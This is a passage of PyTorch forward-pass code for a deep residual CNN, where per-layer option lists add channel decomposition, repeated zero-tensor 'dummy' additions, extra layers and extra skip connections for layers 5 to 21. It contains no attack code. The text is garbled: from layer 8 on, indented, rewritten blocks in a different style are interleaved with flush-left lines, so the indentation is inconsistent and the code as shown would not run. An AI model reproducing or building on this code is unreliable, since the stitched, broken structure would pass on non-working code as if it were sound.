X1_2 = self.conv5_2(X1)
X1_3 = self.conv5_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[5] == 3:
X1_0 = self.conv5_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv5_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[5] == 4:
X1_0 = self.conv5_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv5_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv5_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv5_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv5(X1)
else:
X1 = self.conv5(X1)
if self.dummy_list != None:
if self.dummy_list[5] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[5]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn5(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[5] == 1:
X1 = self.conv5_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[5] == 1:
X1_skip = X1
X1 = self.conv5_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[6] == 1:
X1_0 = self.conv6_0(X1)
X1_1 = self.conv6_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[6] == 2:
X1_0 = self.conv6_0(X1)
X1_1 = self.conv6_1(X1)
X1_2 = self.conv6_2(X1)
X1_3 = self.conv6_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[6] == 3:
X1_0 = self.conv6_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv6_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[6] == 4:
X1_0 = self.conv6_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv6_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv6_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv6_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv6(X1)
else:
X1 = self.conv6(X1)
if self.dummy_list != None:
if self.dummy_list[6] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[6]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn6(X1)
X1 += X0_skip
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[6] == 1:
X1 = self.conv6_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[6] == 1:
X1_skip = X1
X1 = self.conv6_sk(X1)
X1 = self.relu(X1 + X1_skip)
X0_skip = X1
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[7] == 1:
X1_0 = self.conv7_0(X1)
X1_1 = self.conv7_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[7] == 2:
X1_0 = self.conv7_0(X1)
X1_1 = self.conv7_1(X1)
X1_2 = self.conv7_2(X1)
X1_3 = self.conv7_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[7] == 3:
X1_0 = self.conv7_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv7_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[7] == 4:
X1_0 = self.conv7_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv7_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv7_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv7_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv7(X1)
else:
X1 = self.conv7(X1)
if self.dummy_list != None:
if self.dummy_list[7] > 0:
dummy = np.zeros(X1.size()).astype("float32")
for i in range(self.dummy_list[7]):
X1 = torch.add(X1, torch.tensor(dummy, device = cuda_device))
X1 = self.conv_bn7(X1)
if True:
X1 = self.relu(X1)
if self.deepen_list != None:
if self.deepen_list[7] == 1:
X1 = self.conv7_dp(X1)
X1 = self.relu(X1)
if self.skipcon_list != None:
if self.skipcon_list[7] == 1:
X1_skip = X1
X1 = self.conv7_sk(X1)
X1 = self.relu(X1 + X1_skip)
X1_shape = X1.size()
if self.decompo_list != None:
if self.decompo_list[8] == 1:
X1_0 = self.conv8_0(X1)
X1_1 = self.conv8_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[8] == 2:
X1_0 = self.conv8_0(X1)
X1_1 = self.conv8_1(X1)
X1_2 = self.conv8_2(X1)
X1_3 = self.conv8_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[8] == 3:
X1_0 = self.conv8_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv8_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[8] == 4:
X1_0 = self.conv8_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv8_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv8_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv8_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv8(X1)
else:
X1 = self.conv8(X1)
        if self.dummy_list is not None and self.dummy_list[8] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[8]):
                X1 = X1 + dummy
        X1 = self.conv_bn8(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[8] == 1:
            X1 = self.relu(self.conv8_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[8] == 1:
            X1 = self.relu(self.conv8_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[9] == 1:
X1_0 = self.conv9_0(X1)
X1_1 = self.conv9_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[9] == 2:
X1_0 = self.conv9_0(X1)
X1_1 = self.conv9_1(X1)
X1_2 = self.conv9_2(X1)
X1_3 = self.conv9_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[9] == 3:
X1_0 = self.conv9_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv9_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[9] == 4:
X1_0 = self.conv9_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv9_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv9_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv9_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv9(X1)
else:
X1 = self.conv9(X1)
        if self.dummy_list is not None and self.dummy_list[9] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[9]):
                X1 = X1 + dummy
        X1 = self.conv_bn9(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[9] == 1:
            X1 = self.relu(self.conv9_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[9] == 1:
            X1 = self.relu(self.conv9_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[10] == 1:
X1_0 = self.conv10_0(X1)
X1_1 = self.conv10_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[10] == 2:
X1_0 = self.conv10_0(X1)
X1_1 = self.conv10_1(X1)
X1_2 = self.conv10_2(X1)
X1_3 = self.conv10_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[10] == 3:
X1_0 = self.conv10_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv10_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[10] == 4:
X1_0 = self.conv10_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv10_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv10_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv10_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv10(X1)
else:
X1 = self.conv10(X1)
        if self.dummy_list is not None and self.dummy_list[10] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[10]):
                X1 = X1 + dummy
        X1 = self.conv_bn10(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[10] == 1:
            X1 = self.relu(self.conv10_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[10] == 1:
            X1 = self.relu(self.conv10_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[11] == 1:
X1_0 = self.conv11_0(X1)
X1_1 = self.conv11_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[11] == 2:
X1_0 = self.conv11_0(X1)
X1_1 = self.conv11_1(X1)
X1_2 = self.conv11_2(X1)
X1_3 = self.conv11_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[11] == 3:
X1_0 = self.conv11_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv11_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[11] == 4:
X1_0 = self.conv11_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv11_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv11_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv11_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv11(X1)
else:
X1 = self.conv11(X1)
        if self.dummy_list is not None and self.dummy_list[11] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[11]):
                X1 = X1 + dummy
        X1 = self.conv_bn11(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[11] == 1:
            X1 = self.relu(self.conv11_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[11] == 1:
            X1 = self.relu(self.conv11_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[12] == 1:
X1_0 = self.conv12_0(X1)
X1_1 = self.conv12_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[12] == 2:
X1_0 = self.conv12_0(X1)
X1_1 = self.conv12_1(X1)
X1_2 = self.conv12_2(X1)
X1_3 = self.conv12_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[12] == 3:
X1_0 = self.conv12_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv12_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[12] == 4:
X1_0 = self.conv12_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv12_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv12_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv12_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv12(X1)
else:
X1 = self.conv12(X1)
        if self.dummy_list is not None and self.dummy_list[12] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[12]):
                X1 = X1 + dummy
        X1 = self.conv_bn12(X1)
X1_saved = X1
X1 = X0_skip
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[13] == 1:
X1_0 = self.conv13_0(X1)
X1_1 = self.conv13_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[13] == 2:
X1_0 = self.conv13_0(X1)
X1_1 = self.conv13_1(X1)
X1_2 = self.conv13_2(X1)
X1_3 = self.conv13_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[13] == 3:
X1_0 = self.conv13_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv13_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[13] == 4:
X1_0 = self.conv13_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv13_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv13_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv13_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv13(X1)
else:
X1 = self.conv13(X1)
        if self.dummy_list is not None and self.dummy_list[13] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[13]):
                X1 = X1 + dummy
        X1 = self.conv_bn13(X1)
        X1 += X1_saved
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[13] == 1:
            X1 = self.relu(self.conv13_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[13] == 1:
            X1 = self.relu(self.conv13_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[14] == 1:
X1_0 = self.conv14_0(X1)
X1_1 = self.conv14_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[14] == 2:
X1_0 = self.conv14_0(X1)
X1_1 = self.conv14_1(X1)
X1_2 = self.conv14_2(X1)
X1_3 = self.conv14_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[14] == 3:
X1_0 = self.conv14_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv14_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[14] == 4:
X1_0 = self.conv14_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv14_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv14_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv14_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv14(X1)
else:
X1 = self.conv14(X1)
        if self.dummy_list is not None and self.dummy_list[14] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[14]):
                X1 = X1 + dummy
        X1 = self.conv_bn14(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[14] == 1:
            X1 = self.relu(self.conv14_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[14] == 1:
            X1 = self.relu(self.conv14_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[15] == 1:
X1_0 = self.conv15_0(X1)
X1_1 = self.conv15_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[15] == 2:
X1_0 = self.conv15_0(X1)
X1_1 = self.conv15_1(X1)
X1_2 = self.conv15_2(X1)
X1_3 = self.conv15_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[15] == 3:
X1_0 = self.conv15_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv15_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[15] == 4:
X1_0 = self.conv15_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv15_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv15_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv15_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv15(X1)
else:
X1 = self.conv15(X1)
        if self.dummy_list is not None and self.dummy_list[15] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[15]):
                X1 = X1 + dummy
        X1 = self.conv_bn15(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[15] == 1:
            X1 = self.relu(self.conv15_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[15] == 1:
            X1 = self.relu(self.conv15_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[16] == 1:
X1_0 = self.conv16_0(X1)
X1_1 = self.conv16_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[16] == 2:
X1_0 = self.conv16_0(X1)
X1_1 = self.conv16_1(X1)
X1_2 = self.conv16_2(X1)
X1_3 = self.conv16_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[16] == 3:
X1_0 = self.conv16_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv16_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[16] == 4:
X1_0 = self.conv16_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv16_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv16_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv16_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv16(X1)
else:
X1 = self.conv16(X1)
        if self.dummy_list is not None and self.dummy_list[16] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[16]):
                X1 = X1 + dummy
        X1 = self.conv_bn16(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[16] == 1:
            X1 = self.relu(self.conv16_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[16] == 1:
            X1 = self.relu(self.conv16_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[17] == 1:
X1_0 = self.conv17_0(X1)
X1_1 = self.conv17_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[17] == 2:
X1_0 = self.conv17_0(X1)
X1_1 = self.conv17_1(X1)
X1_2 = self.conv17_2(X1)
X1_3 = self.conv17_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[17] == 3:
X1_0 = self.conv17_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv17_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[17] == 4:
X1_0 = self.conv17_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv17_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv17_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv17_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv17(X1)
else:
X1 = self.conv17(X1)
        if self.dummy_list is not None and self.dummy_list[17] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[17]):
                X1 = X1 + dummy
        X1 = self.conv_bn17(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[17] == 1:
            X1 = self.relu(self.conv17_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[17] == 1:
            X1 = self.relu(self.conv17_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[18] == 1:
X1_0 = self.conv18_0(X1)
X1_1 = self.conv18_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[18] == 2:
X1_0 = self.conv18_0(X1)
X1_1 = self.conv18_1(X1)
X1_2 = self.conv18_2(X1)
X1_3 = self.conv18_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[18] == 3:
X1_0 = self.conv18_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv18_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[18] == 4:
X1_0 = self.conv18_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv18_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv18_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv18_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv18(X1)
else:
X1 = self.conv18(X1)
        if self.dummy_list is not None and self.dummy_list[18] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[18]):
                X1 = X1 + dummy
        X1 = self.conv_bn18(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[18] == 1:
            X1 = self.relu(self.conv18_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[18] == 1:
            X1 = self.relu(self.conv18_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[19] == 1:
X1_0 = self.conv19_0(X1)
X1_1 = self.conv19_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[19] == 2:
X1_0 = self.conv19_0(X1)
X1_1 = self.conv19_1(X1)
X1_2 = self.conv19_2(X1)
X1_3 = self.conv19_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[19] == 3:
X1_0 = self.conv19_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv19_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[19] == 4:
X1_0 = self.conv19_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv19_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv19_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv19_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv19(X1)
else:
X1 = self.conv19(X1)
        if self.dummy_list is not None and self.dummy_list[19] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[19]):
                X1 = X1 + dummy
        X1 = self.conv_bn19(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[19] == 1:
            X1 = self.relu(self.conv19_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[19] == 1:
            X1 = self.relu(self.conv19_sk(X1) + X1)
X0_skip = X1
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[20] == 1:
X1_0 = self.conv20_0(X1)
X1_1 = self.conv20_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[20] == 2:
X1_0 = self.conv20_0(X1)
X1_1 = self.conv20_1(X1)
X1_2 = self.conv20_2(X1)
X1_3 = self.conv20_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[20] == 3:
X1_0 = self.conv20_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv20_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[20] == 4:
X1_0 = self.conv20_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv20_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv20_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv20_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv20(X1)
else:
X1 = self.conv20(X1)
        if self.dummy_list is not None and self.dummy_list[20] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[20]):
                X1 = X1 + dummy
        X1 = self.conv_bn20(X1)
        X1 = self.relu(X1)
        if self.deepen_list is not None and self.deepen_list[20] == 1:
            X1 = self.relu(self.conv20_dp(X1))
        if self.skipcon_list is not None and self.skipcon_list[20] == 1:
            X1 = self.relu(self.conv20_sk(X1) + X1)
X1_shape = X1.size()
        if self.decompo_list is not None:
if self.decompo_list[21] == 1:
X1_0 = self.conv21_0(X1)
X1_1 = self.conv21_1(X1)
X1 = torch.cat((X1_0, X1_1), 1)
elif self.decompo_list[21] == 2:
X1_0 = self.conv21_0(X1)
X1_1 = self.conv21_1(X1)
X1_2 = self.conv21_2(X1)
X1_3 = self.conv21_3(X1)
X1 = torch.cat([X1_0, X1_1, X1_2, X1_3], 1)
elif self.decompo_list[21] == 3:
X1_0 = self.conv21_0(X1[:, :int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_1 = self.conv21_1(X1[:, int(torch.floor_divide(X1_shape[1],2)):, :, :])
X1 = torch.add(X1_0, X1_1)
elif self.decompo_list[21] == 4:
X1_0 = self.conv21_0(X1[:, :int(torch.floor_divide(X1_shape[1],4)), :, :])
X1_1 = self.conv21_1(X1[:, int(torch.floor_divide(X1_shape[1],4)):int(torch.floor_divide(X1_shape[1],2)), :, :])
X1_2 = self.conv21_2(X1[:, int(torch.floor_divide(X1_shape[1],2)):int(3*torch.floor_divide(X1_shape[1],4)), :, :])
X1_3 = self.conv21_3(X1[:, int(3*torch.floor_divide(X1_shape[1],4)):, :, :])
X1 = X1_0 + X1_1 + X1_2 + X1_3
else:
X1 = self.conv21(X1)
else:
X1 = self.conv21(X1)
        if self.dummy_list is not None and self.dummy_list[21] > 0:
            dummy = torch.zeros_like(X1)
            for _ in range(self.dummy_list[21]):
                X1 = X1 + dummy
        X1 = self.conv_bn21(X1)
        X1 += X0_skip
        X1 = self.relu(X1)
